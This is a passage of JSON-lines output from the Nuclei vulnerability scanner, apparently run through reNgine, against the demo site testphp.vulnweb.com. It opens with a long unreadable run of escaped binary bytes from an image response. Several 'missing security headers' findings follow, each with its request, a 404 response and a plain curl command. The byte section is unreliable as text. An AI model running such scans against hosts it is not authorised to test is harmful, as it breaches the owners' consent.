d\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:47.94278475Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:48.58011877Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 